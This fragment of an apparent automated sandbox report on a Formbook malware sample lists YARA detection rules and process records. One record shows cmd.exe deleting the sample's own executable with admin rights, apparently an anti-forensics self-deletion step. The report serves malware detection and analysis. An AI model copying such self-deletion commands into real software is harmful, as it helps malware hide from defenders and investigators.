                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:15:10:57
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x2a0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:10:58
                        Start date:25/11/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff61de10000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >